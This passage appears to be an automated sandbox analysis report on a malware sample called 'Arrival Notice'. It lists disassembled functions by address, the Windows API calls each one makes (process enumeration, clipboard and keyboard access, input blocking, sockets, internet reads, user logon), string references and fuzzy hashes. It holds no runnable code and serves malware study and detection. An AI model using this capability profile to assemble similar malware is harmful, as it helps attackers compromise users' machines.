Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99

Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00446A3E
VUUU, xrefs: 004469EC
ERCP, xrefs: 00446722
XjH, xrefs: 0044671B
VUUU, xrefs: 004469CF

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$XjH
API String ID: 0-2872873767
Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A

Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
__wsplitpath.LIBCMT ref: 00475644

Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50

_wcscat.LIBCMT ref: 00475657
__wcsicoll.LIBCMT ref: 0047567B
Process32NextW.KERNEL32(00000000,?), ref: 004756AB
CloseHandle.KERNEL32(00000000), ref: 004756BA

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 2547909840-0
Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68

Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

FindFirstFileW.KERNEL32(?,?), ref: 004524DF
Sleep.KERNEL32(0000000A), ref: 0045250B
FindNextFileW.KERNEL32(?,?), ref: 004525E9
FindClose.KERNEL32(?), ref: 004525FF

Strings

\VH, xrefs: 00452583
*.*, xrefs: 004524C0

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
String ID: *.*$\VH
API String ID: 2786137511-2657498754
Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98

Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00421FC1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
TerminateProcess.KERNEL32(00000000), ref: 00422004

Strings

pqI, xrefs: 00421FDC

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: pqI
API String ID: 2579439406-2459173057
Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D

Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00433349
mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
__wcsicoll.LIBCMT ref: 00433375
mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B

Strings

DOWN, xrefs: 0043336F

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __wcsicollmouse_event
String ID: DOWN
API String ID: 1033544147-711622031
Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD

Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0044C3D2
SetKeyboardState.USER32(00000080), ref: 0044C3F6
PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: KeyboardMessagePostState$InputSend
String ID:
API String ID: 3031425849-0
Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8

Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249

socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
WSAGetLastError.WSOCK32(00000000), ref: 00476692

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799

Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1

IsWindowVisible.USER32 ref: 0047A368
IsWindowEnabled.USER32 ref: 0047A378
GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
IsIconic.USER32 ref: 0047A393
IsZoomed.USER32 ref: 0047A3A1

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9

Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON

Download Yara Rule

APIs

Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9

CoInitialize.OLE32(00000000), ref: 00478442
CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
CoUninitialize.OLE32 ref: 0047863C

Strings

.lnk, xrefs: 004783EB, 004783FE

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96

Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 0046DCE7
IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
GetClipboardData.USER32(0000000D), ref: 0046DD01
CloseClipboard.USER32 ref: 0046DD0D
GlobalLock.KERNEL32(00000000), ref: 0046DD37
CloseClipboard.USER32 ref: 0046DD41
IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
GetClipboardData.USER32(00000001), ref: 0046DD8D
CloseClipboard.USER32 ref: 0046DD99

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
String ID:
API String ID: 15083398-0
Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9

Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044D011

Strings

U, xrefs: 0044FB88
\, xrefs: 0044D061

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove
String ID: U$\
API String ID: 4104443479-100911408
Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55

Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
Opcode Fuzzy Hash: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94

Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
InternetReadFile.WININET(?,00000000,?,?), ref: 00442356

Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Internet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 901099227-0
Opcode ID: 99bb4a73de44f304a5cce5e58a3439d416e34362a59387e6d0e16870e0ee9fb1
Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
Opcode Fuzzy Hash: 99bb4a73de44f304a5cce5e58a3439d416e34362a59387e6d0e16870e0ee9fb1
Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5

Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Proc
String ID:
API String ID: 2346855178-0
Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9

Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0045A38B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6

Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74

Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00472C51

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

